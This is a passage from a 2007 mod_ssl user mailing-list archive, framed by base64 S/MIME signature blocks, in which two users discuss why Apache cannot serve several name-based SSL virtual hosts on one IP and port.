CxMVaHR0cDovL3d3dy5DQWNlcnQub3JnMRwwGgYDVQQDExNDQWNlcnQgQ2xhc3MgMyBSb290
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAq0k1EUh80iZ+U5TPQ6ndKNdCKovz
h3gZWHwPntqJfeH763KQDXShlmSrn6AkmXPa4lV2xxd79QSsRrjDvn9kjRBsJPNhnMDykPpR
5vVpAWPDD1biSkLP4kSMJSioxXkJfUa5ivPp8zQpCEXkHJ/LlAQcgagUs5hlxEPsToKNCdG9
qluNktDs3pDFfwrC4+vmMVpedD6XM1nowwM9YDO/99FvR8TN7mKDUm4uCJqk2RUYkaaFkkew
rkjrbbch7IUaaHI1q//wEF3A9JSnatU7kn5MkAV+k8Esi6SOYnQVcW4LcQPqrxU4mtTSBXJv
jPkr61pyJfk5RuNyGz4Ew2QnIhAqik9YpwOtvrQuE+1dqkjX1X3UKntc+kYEUOTMDkJbjO3b
8s/8lpPg2xE2VGI0OI8MYJs7l1Y4rfPSW4ugW+pOlrh819WghnBA05Ept6I8rfWMu88akork
NHvA2Gxf6QrCw6cgmlrfLF1SXLpH1ZvvJChwOCAv1X8pwLJBA2iSzOCczJdLRe86EAqrcDqY
lXCtNbHqhSukHIAhMamuYHqAJkgAuAHAk2NVIpE8Vuev2zol848xVOomi4FZ+aHRUxHFe50D
9nQR4G2xLD8shpGZcZqmd4s0YNEUtCysna+MENOfxGr4bxP8c1n3ZkJ0Horj+NzSb5icy0eY
lUAF++kCAwEAAaOBvzCBvDAPBgNVHRMBAf8EBTADAQH/MF0GCCsGAQUFBwEBBFEwTzAjBggr
BgEFBQcwAYYXaHR0cDovL29jc3AuQ0FjZXJ0Lm9yZy8wKAYIKwYBBQUHMAKGHGh0dHA6Ly93
d3cuQ0FjZXJ0Lm9yZy9jYS5jcnQwSgYDVR0gBEMwQTA/BggrBgEEAYGQSjAzMDEGCCsGAQUF
BwIBFiVodHRwOi8vd3d3LkNBY2VydC5vcmcvaW5kZXgucGhwP2lkPTEwMA0GCSqGSIb3DQEB
BAUAA4ICAQB/CIih2hpQSdqJ+6EIcvOK9x7EOrR5WyAwsUXewl3TZWnxwl1UVDyFX7l7QpHC
mf0bUZurRqWhEFOebYisc24sM6bw9J7gdcE+iEWp4WZD/lZa0XpBePdA2ko68QtbpbsWBubC
55O5hU2XT7EeOEOA75sNjO+4p2AAh1d9HkQcyyPvmzyZna+1KRxFeRaWTSdt8Rxsw8JVZLO8
FOLzpB8eMvwnFQXP3S6uPoJhe/AhEBj2ROpTOfnc0Jog4Ma74LtaT8SZyAe9tb2i2y5iDUI0
Qbz/i4r1USKqiDAA4rDUvL5lutUDV3mb6NzITfhQ7ZGlUiiirPs2WD7plCuRUIcb1l7WjMz3
DxAMUk7QFmHl5QpsvxfHckZXnJj1bGBjem9euU4vyLm5u2qFvJgN7fk+l4Q0lK4Ar6Hl55Ju
Tr3z4tkUi1zS6wFsoBelLRDrnHpKvb3uzv3tIkCrcDiI9QqHasKrBWDJSAXaU8HeRHdqs/M8
PO2AvKY4SikkX/5ZO5slelZjAGS5XaRifVc2T62D7x+SU6COd1fd5WERPSMAkEw8+qNgkwSj
rzX2DmqPT0pgp4UFbEahj/THduOhWVf3cbLEbhRcbW1BZt8bk7HUAMPuy888PSGAqV9jZfzd
4F+k9CvwhXFB1Gcl+xqxl67WmYITQdJupRuZJ4DnC6moADCCBhMwggP7oAMCAQICAi6dMA0G
CSqGSIb3DQEBBQUAMFQxFDASBgNVBAoTC0NBY2VydCBJbmMuMR4wHAYDVQQLExVodHRwOi8v
d3d3LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBDbGFzcyAzIFJvb3QwHhcNMDcwNzAy
MjEyODMzWhcNMDkwNzAxMjEyODMzWjCBzTEaMBgGA1UEAxMRQWFyb24gQ2FyeSBEYWx0b24x
HzAdBgkqhkiG9w0BCQEWEGFhcm9uQGRhbHRvbnMuY2ExHTAbBgkqhkiG9w0BCQEWDmFhcm9u
QGZpbmNoLnN0MSgwJgYJKoZIhvcNAQkBFhlhYXJvbkBzdXBlcmR1cGVyZ2FtZXMub3JnMSAw
HgYJKoZIhvcNAQkBFhFhYXJvbkBmcmVlYnNkLm9yZzEjMCEGCSqGSIb3DQEJARYUYWNkYWx0
b25AdWNhbGdhcnkuY2EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDQJs1d+gGC
+adl2Cy5cI2rJsTz2EIA9ScG4kTkgMqZfhwomnQP7klgw2NuoOeflr7SMYlV0odyq1bvPjU8
0kmdc3mrDFv/lmFshadr+se3SuON5K/GVy+iLFslM8o7a7uKJmInjMNjYyoiSTdLznIop2Rv
QIoC6tOBg+h4ULN1H1UklPfvfi8AiSxz6bpTdCFMNch9ggvsXAXt0fzEb2NINV3J1+lCeIpI
I0ry/8jv9ztZUehvyaq1m7HXtr2BtYNa1AxD+nL94/XgndzgGqs3h/43FmFUNYDvFaBi6VHN
klx0aPLqeu/vNazJFCGPcqYFKUUD21XaC3ynyfoTSanbAgMBAAGjggFzMIIBbzAMBgNVHRMB
Af8EAjAAMFYGCWCGSAGG+EIBDQRJFkdUbyBnZXQgeW91ciBvd24gY2VydGlmaWNhdGUgZm9y
IEZSRUUgaGVhZCBvdmVyIHRvIGh0dHA6Ly93d3cuQ0FjZXJ0Lm9yZzBiBgNVHSUEWzBZBggr
BgEFBQcDBAYIKwYBBQUHAwIGCCsGAQUFBwMDBgorBgEEAYI3AgEVBgorBgEEAYI3AgEWBgor
BgEEAYI3CgMEBgorBgEEAYI3CgMDBglghkgBhvhCBAEwMgYIKwYBBQUHAQEEJjAkMCIGCCsG
AQUFBzABhhZodHRwOi8vb2NzcC5jYWNlcnQub3JnMG8GA1UdEQRoMGaBEGFhcm9uQGRhbHRv
bnMuY2GBDmFhcm9uQGZpbmNoLnN0gRlhYXJvbkBzdXBlcmR1cGVyZ2FtZXMub3JngRFhYXJv
bkBmcmVlYnNkLm9yZ4EUYWNkYWx0b25AdWNhbGdhcnkuY2EwDQYJKoZIhvcNAQEFBQADggIB
AABvuxnNMYpbx0t1gLs0vgCewm7MGk0b3CCj/7FcAJFNY8YHNHFcyfrph3dld29S0U1CvHGm
5J8UzsdHycleszUv8jReVRC+jK3qfa0SJCvu8DLt8YN6nrkQv9yK0FCvb8uaCNovbkESvy3Y
XEAfNBefNkZNd4CN9Qhl4UqzVFSrVSHsVmLXaWhfaDGnAJ44YVYky1OvY6NPCsacPiqkvY9C
0r6sYVcdujmj0Khonwg734MNlGxjLICu6gxduub7Y+qC1QH2fzeCnyYDo9H0uN9M7NhYm2mr
1lIwIahrDvtMfCOeTV2ugocCWDHqCXOfExolS80olkVeqwuY9KwQxe7jHivapmUcSfw2R6qW
MQhE6FLzmOqqxDM3EdRbfRcMs9PgzPUx02lVo/ZNdmvF1a7FcArY8ulQ27Zy2laIyu6lfvVJ
yyH/1EeYNnKhtR0lzfdkaNyF+6SGUzDaGdcYgkH0CNQcJMfIXUcTmaodt07hqO2kppHP3284
zKnACN9k/btC+xgrzQAzzj70oKB25okQ2T8cX9evJDFhgG34G0UJY9/HJURY4Ckl60O7GTsN
VllozZV9E04dKjg9N0OqC0OOvgY4mCmcQpmi0QPnjutZzfxtE0C3dti8xC/fq8qFoxkZmXfn
d+9Y5c0Ql4mOzyU+Vogh8xWfMgaE17K8mk8hMIIGEzCCA/ugAwIBAgICLp0wDQYJKoZIhvcN
AQEFBQAwVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4xHjAcBgNVBAsTFWh0dHA6Ly93d3cuQ0Fj
ZXJ0Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMgUm9vdDAeFw0wNzA3MDIyMTI4MzNa
Fw0wOTA3MDEyMTI4MzNaMIHNMRowGAYDVQQDExFBYXJvbiBDYXJ5IERhbHRvbjEfMB0GCSqG
SIb3DQEJARYQYWFyb25AZGFsdG9ucy5jYTEdMBsGCSqGSIb3DQEJARYOYWFyb25AZmluY2gu
c3QxKDAmBgkqhkiG9w0BCQEWGWFhcm9uQHN1cGVyZHVwZXJnYW1lcy5vcmcxIDAeBgkqhkiG
9w0BCQEWEWFhcm9uQGZyZWVic2Qub3JnMSMwIQYJKoZIhvcNAQkBFhRhY2RhbHRvbkB1Y2Fs
Z2FyeS5jYTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANAmzV36AYL5p2XYLLlw
jasmxPPYQgD1JwbiROSAypl+HCiadA/uSWDDY26g55+WvtIxiVXSh3KrVu8+NTzSSZ1zeasM
W/+WYWyFp2v6x7dK443kr8ZXL6IsWyUzyjtru4omYieMw2NjKiJJN0vOciinZG9AigLq04GD
6HhQs3UfVSSU9+9+LwCJLHPpulN0IUw1yH2CC+xcBe3R/MRvY0g1XcnX6UJ4ikgjSvL/yO/3
O1lR6G/JqrWbsde2vYG1g1rUDEP6cv3j9eCd3OAaqzeH/jcWYVQ1gO8VoGLpUc2SXHRo8up6
7+81rMkUIY9ypgUpRQPbVdoLfKfJ+hNJqdsCAwEAAaOCAXMwggFvMAwGA1UdEwEB/wQCMAAw
VgYJYIZIAYb4QgENBEkWR1RvIGdldCB5b3VyIG93biBjZXJ0aWZpY2F0ZSBmb3IgRlJFRSBo
ZWFkIG92ZXIgdG8gaHR0cDovL3d3dy5DQWNlcnQub3JnMGIGA1UdJQRbMFkGCCsGAQUFBwME
BggrBgEFBQcDAgYIKwYBBQUHAwMGCisGAQQBgjcCARUGCisGAQQBgjcCARYGCisGAQQBgjcK
AwQGCisGAQQBgjcKAwMGCWCGSAGG+EIEATAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAGG
Fmh0dHA6Ly9vY3NwLmNhY2VydC5vcmcwbwYDVR0RBGgwZoEQYWFyb25AZGFsdG9ucy5jYYEO
YWFyb25AZmluY2guc3SBGWFhcm9uQHN1cGVyZHVwZXJnYW1lcy5vcmeBEWFhcm9uQGZyZWVi
c2Qub3JngRRhY2RhbHRvbkB1Y2FsZ2FyeS5jYTANBgkqhkiG9w0BAQUFAAOCAgEAAG+7Gc0x
ilvHS3WAuzS+AJ7CbswaTRvcIKP/sVwAkU1jxgc0cVzJ+umHd2V3b1LRTUK8cabknxTOx0fJ
yV6zNS/yNF5VEL6Mrep9rRIkK+7wMu3xg3qeuRC/3IrQUK9vy5oI2i9uQRK/LdhcQB80F582
Rk13gI31CGXhSrNUVKtVIexWYtdpaF9oMacAnjhhViTLU69jo08Kxpw+KqS9j0LSvqxhVx26
OaPQqGifCDvfgw2UbGMsgK7qDF265vtj6oLVAfZ/N4KfJgOj0fS430zs2FibaavWUjAhqGsO
+0x8I55NXa6ChwJYMeoJc58TGiVLzSiWRV6rC5j0rBDF7uMeK9qmZRxJ/DZHqpYxCEToUvOY
6qrEMzcR1Ft9Fwyz0+DM9THTaVWj9k12a8XVrsVwCtjy6VDbtnLaVojK7qV+9UnLIf/UR5g2
cqG1HSXN92Ro3IX7pIZTMNoZ1xiCQfQI1Bwkx8hdRxOZqh23TuGo7aSmkc/fbzjMqcAI32T9
u0L7GCvNADPOPvSgoHbmiRDZPxxf168kMWGAbfgbRQlj38clRFjgKSXrQ7sZOw1WWWjNlX0T
Th0qOD03Q6oLQ46+BjiYKZxCmaLRA+eO61nN/G0TQLd22LzEL9+ryoWjGRmZd+d371jlzRCX
iY7PJT5WiCHzFZ8yBoTXsryaTyExggMOMIIDCgIBATBaMFQxFDASBgNVBAoTC0NBY2VydCBJ
bmMuMR4wHAYDVQQLExVodHRwOi8vd3d3LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBD
bGFzcyAzIFJvb3QCAi6dMAkGBSsOAwIaBQCgggGJMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0B
BwEwHAYJKoZIhvcNAQkFMQ8XDTA3MDgwMjAxMTcyNFowIwYJKoZIhvcNAQkEMRYEFNqIFIvF
nSAE2IOzJ50UKKuJNMltMFIGCSqGSIb3DQEJDzFFMEMwCgYIKoZIhvcNAwcwDgYIKoZIhvcN
AwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3DQMCAgEoMGkGCSsGAQQB
gjcQBDFcMFowVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4xHjAcBgNVBAsTFWh0dHA6Ly93d3cu
Q0FjZXJ0Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMgUm9vdAICLp0wawYLKoZIhvcN
AQkQAgsxXKBaMFQxFDASBgNVBAoTC0NBY2VydCBJbmMuMR4wHAYDVQQLExVodHRwOi8vd3d3
LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBDbGFzcyAzIFJvb3QCAi6dMA0GCSqGSIb3
DQEBAQUABIIBALuNyk49YCH+tmjwcsRL0H5L2ZbvwEZ7hBP13IUNHtnZ+HTD9bezMJvzixBm
R1rzjAZCS7cWmj+HnjDUghQMMZGIr5fP5PjYJybJGwndrbh6tpcXnuhNux7PQyvtrZtfnKP2
NADL3/DPb8+6ebDYAsSZMXeyWEHGWZAoldASty+ZfPa95YoxJBDjnG+a2A9jUiR0TTNMFGaC
NHgJ7C2mLdl2Gkx9oHNzV2LADgqBMS1/mWxx3K0WfE9N2RITgbX0xxbT72EtZu02ROUxsPJh
IEHsOxqDhoP3nzUTiiXFT9MBwzja56TWfu44GcE35BNf86pvjHsEyt6QPBRnGaI10AMAAAAA
AAA=
--------------ms060906060902050701090405--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  2 09:03:06 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1DE3214D85E; Thu,  2 Aug 2007 09:03:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web25410.mail.ukl.yahoo.com (web25410.mail.ukl.yahoo.com [217.12.10.201])
	by master.modssl.org (Postfix) with SMTP id 7FABA14D84F
	for ; Thu,  2 Aug 2007 09:03:05 +0200 (CEST)
Received: (qmail 34498 invoked by uid 60001); 2 Aug 2007 07:02:59 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.co.uk;
  h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=rlAzA0/qYagGmVLGrhaoEhDllFPY0IRdKDERLFTGRd9X1tiS9JGct0TGjbCzX19Kl2H9iNSs88dniJ66k7wK/kVMRt83qOXuzdvw7xtoBj0gL27Pbznc0PfFPTtFP5EqGRpbMpy2EnfCnpw8JJ1eekTleNHse6/0gmA7y9lEYTU=;
X-YMail-OSG: BZT0NCkVM1l0298J0IIAfLuoq4SzRyO.EGakl16B9bqVjtyXNq.YwEvaV9joOv0v93pb.yJa1cBnpnalw.FZ7fOhVwylhE5vgXiGjVUTI6OO8Tw4IcSwJneNX68-
Received: from [81.104.240.100] by web25410.mail.ukl.yahoo.com via HTTP; Thu, 02 Aug 2007 08:02:59 BST
Date: Thu, 2 Aug 2007 08:02:59 +0100 (BST)
From: Glyn Astill 
Subject: Re: SSL and Virtual hosts?
To: modssl-users@modssl.org
In-Reply-To: <46B130A4.7030905@daltons.ca>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-ID: <739491.33796.qm@web25410.mail.ukl.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Glyn Astill 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Aaron,

As I uderstand, the docks say you can't have name based virtual hosts
because SSL is alreday serving the page before apache sees any http
header?

In the example I posted, https://mail.mydomain.net works and takes me
to my webmail, and https://machinename.mydomain.net works and takes
me to my main webpage, however https://.nydomain.net or
https://www.mydomain.net refuses the connection.

This I don't understand. If it can see mail.mydomain.net and take me
there, and it can see machinename.mydomain.net and take me there why
can't it take me to www.mydomain.net?

All I really need is mail.mydomain.net to take me to my webmail, and
anything else to just go to htdocs as normal. Can I set this up with
just one virtual host, and then some sort of catch all filter for
everything else?

Thanks
Glyn



--- Aaron Dalton  wrote:

> Glyn Astill wrote:
> > Hi people,
> > 
> > So I got ssl started, and now I'm trying to sort out my virtual
> hosts
> > but I can't seem to get them to work.
> > 
> 
> Due to the fundamental nature of SSL and virtual host resolution
> one may
> not have more than one SSL-enabled virtual host per IP:port
> combination.
> 
> http://httpd.apache.org/docs/2.0/ssl/ssl_faq.html#vhosts
> 
> -- 
> Aaron Dalton       |   Super Duper Games
> aaron@daltons.ca   |   http://superdupergames.org
> 



      ___________________________________________________________ 
Yahoo! Mail is the world's favourite email. Don't settle for less, sign up for
your free account today http://uk.rd.yahoo.com/evt=44106/*http://uk.docs.yahoo.com/mail/winter07.html 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  2 17:16:20 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B998514D8AA; Thu,  2 Aug 2007 17:16:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from outbound03.telus.net (outbound03.telus.net [199.185.220.222])
	by master.modssl.org (Postfix) with ESMTP id E0FCC14D84F
	for ; Thu,  2 Aug 2007 17:16:19 +0200 (CEST)
Received: from priv-edtnaa05.telusplanet.net ([137.186.246.196])
          by priv-edtnes86.telusplanet.net
          (InterMail vM.7.08.02.00 201-2186-121-20061213) with ESMTP
          id <20070802151613.QLNL5163.priv-edtnes86.telusplanet.net@priv-edtnaa05.telusplanet.net>;
          Thu, 2 Aug 2007 09:16:13 -0600
Received: from [192.168.2.100] (d137-186-246-196.abhsia.telus.net [137.186.246.196])
	by priv-edtnaa05.telusplanet.net (BorderWare MXtreme Infinity Mail Firewall) with ESMTP
	id CFXP6QKENW; Thu,  2 Aug 2007 09:16:12 -0600 (MDT)
Message-ID: <46B1F53B.5010105@daltons.ca>
Date: Thu, 02 Aug 2007 09:16:11 -0600
From: Aaron Dalton 
User-Agent: Thunderbird 2.0.0.5 (Windows/20070716)
MIME-Version: 1.0
To: modssl-users@modssl.org, glynastill@yahoo.co.uk
Subject: Re: SSL and Virtual hosts?
References: <739491.33796.qm@web25410.mail.ukl.yahoo.com>
In-Reply-To: <739491.33796.qm@web25410.mail.ukl.yahoo.com>
X-Enigmail-Version: 0.95.2
OpenPGP: id=8811D2A4;
	url=https://biglumber.com/x/web?qs=8811d2a4
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms050100080204030207040305"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aaron Dalton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms050100080204030207040305
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Glyn Astill wrote:
> Hi Aaron,
> 
> As I uderstand, the docks say you can't have name based virtual hosts
> because SSL is alreday serving the page before apache sees any http
> header?
> 

That is essentially correct.

> In the example I posted, https://mail.mydomain.net works and takes me
> to my webmail, and https://machinename.mydomain.net works and takes
> me to my main webpage, however https://.nydomain.net or
> https://www.mydomain.net refuses the connection.
> 
> This I don't understand. *snip*

Nor do I.  Your previous message was saying this did *not* work.  In any
case, multiple virtual hosts on the same IP:port does not work.  All I
can say is that I am certain things are not working the way you think
they are.

-- 
Aaron Dalton       |   Super Duper Games
aaron@daltons.ca   |   http://superdupergames.org

--------------ms050100080204030207040305
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIISOjCC
BggwggPwoAMCAQICAQEwDQYJKoZIhvcNAQEEBQAweTEQMA4GA1UEChMHUm9vdCBDQTEeMBwG
A1UECxMVaHR0cDovL3d3dy5jYWNlcnQub3JnMSIwIAYDVQQDExlDQSBDZXJ0IFNpZ25pbmcg
QXV0aG9yaXR5MSEwHwYJKoZIhvcNAQkBFhJzdXBwb3J0QGNhY2VydC5vcmcwHhcNMDUxMDE0
MDczNjU1WhcNMzMwMzI4MDczNjU1WjBUMRQwEgYDVQQKEwtDQWNlcnQgSW5jLjEeMBwGA1UE
CxMVaHR0cDovL3d3dy5DQWNlcnQub3JnMRwwGgYDVQQDExNDQWNlcnQgQ2xhc3MgMyBSb290
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAq0k1EUh80iZ+U5TPQ6ndKNdCKovz
h3gZWHwPntqJfeH763KQDXShlmSrn6AkmXPa4lV2xxd79QSsRrjDvn9kjRBsJPNhnMDykPpR
5vVpAWPDD1biSkLP4kSMJSioxXkJfUa5ivPp8zQpCEXkHJ/LlAQcgagUs5hlxEPsToKNCdG9
qluNktDs3pDFfwrC4+vmMVpedD6XM1nowwM9YDO/99FvR8TN7mKDUm4uCJqk2RUYkaaFkkew
rkjrbbch7IUaaHI1q//wEF3A9JSnatU7kn5MkAV+k8Esi6SOYnQVcW4LcQPqrxU4mtTSBXJv
jPkr61pyJfk5RuNyGz4Ew2QnIhAqik9YpwOtvrQuE+1dqkjX1X3UKntc+kYEUOTMDkJbjO3b
8s/8lpPg2xE2VGI0OI8MYJs7l1Y4rfPSW4ugW+pOlrh819WghnBA05Ept6I8rfWMu88akork
NHvA2Gxf6QrCw6cgmlrfLF1SXLpH1ZvvJChwOCAv1X8pwLJBA2iSzOCczJdLRe86EAqrcDqY
lXCtNbHqhSukHIAhMamuYHqAJkgAuAHAk2NVIpE8Vuev2zol848xVOomi4FZ+aHRUxHFe50D
9nQR4G2xLD8shpGZcZqmd4s0YNEUtCysna+MENOfxGr4bxP8c1n3ZkJ0Horj+NzSb5icy0eY
lUAF++kCAwEAAaOBvzCBvDAPBgNVHRMBAf8EBTADAQH/MF0GCCsGAQUFBwEBBFEwTzAjBggr
BgEFBQcwAYYXaHR0cDovL29jc3AuQ0FjZXJ0Lm9yZy8wKAYIKwYBBQUHMAKGHGh0dHA6Ly93
d3cuQ0FjZXJ0Lm9yZy9jYS5jcnQwSgYDVR0gBEMwQTA/BggrBgEEAYGQSjAzMDEGCCsGAQUF
BwIBFiVodHRwOi8vd3d3LkNBY2VydC5vcmcvaW5kZXgucGhwP2lkPTEwMA0GCSqGSIb3DQEB
BAUAA4ICAQB/CIih2hpQSdqJ+6EIcvOK9x7EOrR5WyAwsUXewl3TZWnxwl1UVDyFX7l7QpHC
mf0bUZurRqWhEFOebYisc24sM6bw9J7gdcE+iEWp4WZD/lZa0XpBePdA2ko68QtbpbsWBubC
55O5hU2XT7EeOEOA75sNjO+4p2AAh1d9HkQcyyPvmzyZna+1KRxFeRaWTSdt8Rxsw8JVZLO8
FOLzpB8eMvwnFQXP3S6uPoJhe/AhEBj2ROpTOfnc0Jog4Ma74LtaT8SZyAe9tb2i2y5iDUI0
Qbz/i4r1USKqiDAA4rDUvL5lutUDV3mb6NzITfhQ7ZGlUiiirPs2WD7plCuRUIcb1l7WjMz3
DxAMUk7QFmHl5QpsvxfHckZXnJj1bGBjem9euU4vyLm5u2qFvJgN7fk+l4Q0lK4Ar6Hl55Ju
Tr3z4tkUi1zS6wFsoBelLRDrnHpKvb3uzv3tIkCrcDiI9QqHasKrBWDJSAXaU8HeRHdqs/M8
PO2AvKY4SikkX/5ZO5slelZjAGS5XaRifVc2T62D7x+SU6COd1fd5WERPSMAkEw8+qNgkwSj
rzX2DmqPT0pgp4UFbEahj/THduOhWVf3cbLEbhRcbW1BZt8bk7HUAMPuy888PSGAqV9jZfzd
4F+k9CvwhXFB1Gcl+xqxl67WmYITQdJupRuZJ4DnC6moADCCBhMwggP7oAMCAQICAi6dMA0G
CSqGSIb3DQEBBQUAMFQxFDASBgNVBAoTC0NBY2VydCBJbmMuMR4wHAYDVQQLExVodHRwOi8v
d3d3LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBDbGFzcyAzIFJvb3QwHhcNMDcwNzAy
MjEyODMzWhcNMDkwNzAxMjEyODMzWjCBzTEaMBgGA1UEAxMRQWFyb24gQ2FyeSBEYWx0b24x
HzAdBgkqhkiG9w0BCQEWEGFhcm9uQGRhbHRvbnMuY2ExHTAbBgkqhkiG9w0BCQEWDmFhcm9u
QGZpbmNoLnN0MSgwJgYJKoZIhvcNAQkBFhlhYXJvbkBzdXBlcmR1cGVyZ2FtZXMub3JnMSAw
HgYJKoZIhvcNAQkBFhFhYXJvbkBmcmVlYnNkLm9yZzEjMCEGCSqGSIb3DQEJARYUYWNkYWx0
b25AdWNhbGdhcnkuY2EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDQJs1d+gGC
+adl2Cy5cI2rJsTz2EIA9ScG4kTkgMqZfhwomnQP7klgw2NuoOeflr7SMYlV0odyq1bvPjU8
0kmdc3mrDFv/lmFshadr+se3SuON5K/GVy+iLFslM8o7a7uKJmInjMNjYyoiSTdLznIop2Rv
QIoC6tOBg+h4ULN1H1UklPfvfi8AiSxz6bpTdCFMNch9ggvsXAXt0fzEb2NINV3J1+lCeIpI
I0ry/8jv9ztZUehvyaq1m7HXtr2BtYNa1AxD+nL94/XgndzgGqs3h/43FmFUNYDvFaBi6VHN
klx0aPLqeu/vNazJFCGPcqYFKUUD21XaC3ynyfoTSanbAgMBAAGjggFzMIIBbzAMBgNVHRMB
Af8EAjAAMFYGCWCGSAGG+EIBDQRJFkdUbyBnZXQgeW91ciBvd24gY2VydGlmaWNhdGUgZm9y
IEZSRUUgaGVhZCBvdmVyIHRvIGh0dHA6Ly93d3cuQ0FjZXJ0Lm9yZzBiBgNVHSUEWzBZBggr
BgEFBQcDBAYIKwYBBQUHAwIGCCsGAQUFBwMDBgorBgEEAYI3AgEVBgorBgEEAYI3AgEWBgor
BgEEAYI3CgMEBgorBgEEAYI3CgMDBglghkgBhvhCBAEwMgYIKwYBBQUHAQEEJjAkMCIGCCsG
AQUFBzABhhZodHRwOi8vb2NzcC5jYWNlcnQub3JnMG8GA1UdEQRoMGaBEGFhcm9uQGRhbHRv
bnMuY2GBDmFhcm9uQGZpbmNoLnN0gRlhYXJvbkBzdXBlcmR1cGVyZ2FtZXMub3JngRFhYXJv
bkBmcmVlYnNkLm9yZ4EUYWNkYWx0b25AdWNhbGdhcnkuY2EwDQYJKoZIhvcNAQEFBQADggIB
AABvuxnNMYpbx0t1gLs0vgCewm7MGk0b3CCj/7FcAJFNY8YHNHFcyfrph3dld29S0U1CvHGm
5J8UzsdHycleszUv8jReVRC+jK3qfa0SJCvu8DLt8YN6nrkQv9yK0FCvb8uaCNovbkESvy3Y
XEAfNBefNkZNd4CN9Qhl4UqzVFSrVSHsVmLXaWhfaDGnAJ44YVYky1OvY6NPCsacPiqkvY9C
0r6sYVcdujmj0Khonwg734MNlGxjLICu6gxduub7Y+qC1QH2fzeCnyYDo9H0uN9M7NhYm2mr
1lIwIahrDvtMfCOeTV2ugocCWDHqCXOfExolS80olkVeqwuY9KwQxe7jHivapmUcSfw2R6qW
MQhE6FLzmOqqxDM3EdRbfRcMs9PgzPUx02lVo/ZNdmvF1a7FcArY8ulQ27Zy2laIyu6lfvVJ
yyH/1EeYNnKhtR0lzfdkaNyF+6SGUzDaGdcYgkH0CNQcJMfIXUcTmaodt07hqO2kppHP3284
zKnACN9k/btC+xgrzQAzzj70oKB25okQ2T8cX9evJDFhgG34G0UJY9/HJURY4Ckl60O7GTsN
VllozZV9E04dKjg9N0OqC0OOvgY4mCmcQpmi0QPnjutZzfxtE0C3dti8xC/fq8qFoxkZmXfn
d+9Y5c0Ql4mOzyU+Vogh8xWfMgaE17K8mk8hMIIGEzCCA/ugAwIBAgICLp0wDQYJKoZIhvcN
AQEFBQAwVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4xHjAcBgNVBAsTFWh0dHA6Ly93d3cuQ0Fj
ZXJ0Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMgUm9vdDAeFw0wNzA3MDIyMTI4MzNa
Fw0wOTA3MDEyMTI4MzNaMIHNMRowGAYDVQQDExFBYXJvbiBDYXJ5IERhbHRvbjEfMB0GCSqG
SIb3DQEJARYQYWFyb25AZGFsdG9ucy5jYTEdMBsGCSqGSIb3DQEJARYOYWFyb25AZmluY2gu
c3QxKDAmBgkqhkiG9w0BCQEWGWFhcm9uQHN1cGVyZHVwZXJnYW1lcy5vcmcxIDAeBgkqhkiG
9w0BCQEWEWFhcm9uQGZyZWVic2Qub3JnMSMwIQYJKoZIhvcNAQkBFhRhY2RhbHRvbkB1Y2Fs
Z2FyeS5jYTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANAmzV36AYL5p2XYLLlw
jasmxPPYQgD1JwbiROSAypl+HCiadA/uSWDDY26g55+WvtIxiVXSh3KrVu8+NTzSSZ1zeasM
W/+WYWyFp2v6x7dK443kr8ZXL6IsWyUzyjtru4omYieMw2NjKiJJN0vOciinZG9AigLq04GD
